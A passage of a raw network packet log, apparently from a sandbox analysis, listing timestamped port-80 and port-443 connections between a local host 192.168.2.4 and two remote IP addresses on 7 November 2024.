Nov 7, 2024 07:33:31.712270021 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712280989 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712301970 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712301970 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712327957 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712331057 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712342978 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712352991 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712363958 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712388992 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712460041 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712471962 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712482929 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712495089 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712517023 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712537050 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712548018 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712558031 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712570906 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712583065 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712599993 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712631941 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712660074 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712672949 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712687969 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712691069 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712703943 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712717056 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712737083 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712769985 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712780952 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712791920 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712801933 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712812901 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712825060 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712857962 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712889910 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712902069 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712912083 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712933064 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712945938 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712953091 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.712971926 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712984085 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.712996006 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713010073 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713031054 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713038921 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713051081 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713052034 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713063002 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713079929 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713104010 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713157892 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713171005 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713191986 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713208914 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713234901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713246107 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713258028 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713265896 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713288069 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713299990 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713363886 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713376045 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713387012 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713411093 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713423014 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713449001 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713459969 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713469982 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713481903 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713488102 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713498116 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.713511944 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.713538885 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748161077 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748172998 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748184919 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748197079 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748224974 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748241901 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748246908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748284101 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748296976 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748301029 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748313904 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748328924 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748336077 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748358011 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748361111 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748394966 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748411894 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748456955 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748490095 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748502016 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748512030 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.748528957 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748536110 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.748553991 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.753787994 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.753829956 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.753880024 CET	49936	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.788810015 CET	49936	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.788820028 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.788902044 CET	49936	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.788907051 CET	443	49936	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.827094078 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827106953 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827267885 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827297926 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827337027 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827347994 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827362061 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827445030 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827455044 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827476025 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827528000 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827543974 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827580929 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827594042 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827605009 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827605963 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827655077 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827655077 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827754021 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827799082 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827815056 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827861071 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827861071 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827869892 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827887058 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827908039 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.827918053 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.827928066 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828008890 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828016996 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828035116 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828047037 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828058958 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828085899 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828197002 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828210115 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828221083 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828231096 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828243971 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828301907 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828315973 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828326941 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828337908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828381062 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828413010 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828424931 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828442097 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828453064 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828525066 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828537941 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828547955 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828547955 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828593969 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828593969 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828603983 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828615904 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828625917 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828718901 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828731060 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828742027 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828742981 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828754902 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828766108 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828783989 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828829050 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828857899 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828867912 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828882933 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828893900 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828905106 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.828907013 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828922033 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.828998089 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.829015017 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.829020977 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.829066992 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.829066992 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.829241037 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.829309940 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.829320908 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:31.829334974 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.829385042 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:31.910882950 CET	49943	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.910943031 CET	443	49943	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:31.917659044 CET	49943	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.922580004 CET	49943	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:31.922595024 CET	443	49943	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:32.061688900 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061712027 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061726093 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061743021 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061754942 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061758995 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061767101 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061779976 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061794996 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061794996 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061825037 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061836004 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061846018 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061852932 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061860085 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061862946 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061872005 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061885118 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061885118 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061887980 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061899900 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061902046 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061918974 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.061930895 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061930895 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.061969042 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062058926 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062061071 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062138081 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062356949 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062441111 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062653065 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062661886 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062674046 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062686920 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062696934 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062706947 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062712908 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062716961 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062736034 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062788963 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062812090 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062824965 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062834978 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062846899 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062856913 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062858105 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062870026 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062876940 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062884092 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062892914 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062902927 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062907934 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062907934 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062916994 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062927961 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062937975 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062938929 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062949896 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062961102 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062968016 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.062973976 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.062979937 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063038111 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063298941 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063386917 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063499928 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063512087 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063522100 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063534021 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063545942 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063551903 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063563108 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063572884 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063579082 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063579082 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063585043 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063599110 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063606024 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063611031 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063616037 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063625097 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063637018 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063647985 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063653946 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063666105 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063672066 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063672066 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063679934 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063693047 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063704967 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063715935 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063715935 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063729048 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063735962 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063735962 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063743114 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063755035 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063766003 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063766003 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063779116 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063790083 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063797951 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063801050 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063808918 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063816071 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.063848019 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.063848019 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064389944 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064400911 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064409971 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064428091 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064449072 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064474106 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064474106 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064487934 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064500093 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064511061 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064521074 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064532042 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064543009 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064553976 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064555883 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064565897 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064577103 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064577103 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064578056 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064591885 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064604044 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064613104 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064616919 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064625025 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064635992 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064646959 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064649105 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064654112 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064660072 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.064680099 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.064712048 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065030098 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065042019 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065149069 CET	49934	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:32.065181017 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065198898 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065210104 CET	80	49934	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:32.065220118 CET	80	49934	185.215.113.16	192.168.2.4
